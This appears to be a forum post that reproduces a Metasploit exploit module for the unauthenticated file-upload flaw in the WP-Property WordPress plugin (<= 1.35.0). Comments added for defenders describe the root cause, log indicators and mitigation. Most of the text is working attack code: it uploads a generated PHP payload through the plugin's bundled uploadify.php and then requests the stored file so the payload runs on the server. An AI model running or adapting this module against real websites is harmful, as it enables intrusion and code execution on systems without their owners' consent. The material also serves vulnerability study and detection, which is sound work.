WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

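# Framework core plus the PhpEXE mixin that the module class includes.
# (Trailing paste residue after the first require made the line unparseable.)
require 'msf/core'
require 'msf/core/exploit/php_exe'
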
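# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0), reached through the bundled
# third-party/uploadify/uploadify.php script.
#
# The listing as pasted was interleaved with forum residue and did not parse:
# the mixin name had been mangled to `Msf::Exploit:hpEXE` (restored to
# Msf::Exploit::PhpEXE, matching the required 'msf/core/exploit/php_exe'),
# the opening bracket of the 'Author' array was lost, and several statements
# were fused onto single lines. The logic below is otherwise unchanged.
#
# Reviewer notes for defenders, derived from the requests this module sends:
# - Root cause: uploadify.php accepts a multipart upload with no
#   authentication and stores it where it can be requested back. The store
#   path is whatever the script echoes in its response body.
# - Log indicators: a POST to
#   .../wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   carrying a "Filedata" part whose filename ends in .php, followed by a GET
#   for the path returned in the response body.
# - Mitigation: upgrade the plugin past the affected range or remove the
#   bundled uploadify script. Denying script execution in upload directories
#   is a general hardening step, not something this page documents.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (references, targets, payload constraints) and
  # the TARGETURI option pointing at the WordPress base path.
  #
  # info - Hash of metadata overrides merged by update_info.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the uploadify script under TARGETURI.
  #
  # Returns CheckCode::Unknown when there is no response or the status is not
  # 200, otherwise CheckCode::Appears.
  #
  # NOTE(review): this only shows the script path answers 200. It does not
  # compare the plugin version against the affected range (<= 1.35.0), so a
  # patched install that still ships the file, or a site that returns 200 for
  # missing pages, will also report "Appears". Treat the result as a lead to
  # confirm against the installed plugin version, not as proof.
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads the generated PHP payload through uploadify.php, then requests the
  # location the server reports so the uploaded file is run.
  #
  # Fails with Failure::UnexpectedReply when the upload response is missing,
  # is not a 200, or does not mention the uploaded file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Random five-letter .php name; the payload is generated with
    # :unlink_self => true.
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Multipart body: the file part ("Filedata") and the destination directory
    # ("folder"), which is set to the uploadify directory itself.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Strip the CRLF that precedes a "--_Part_" boundary at the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the path of the stored file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end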
不要问我这写的是什么 怎么利用 我是说msf.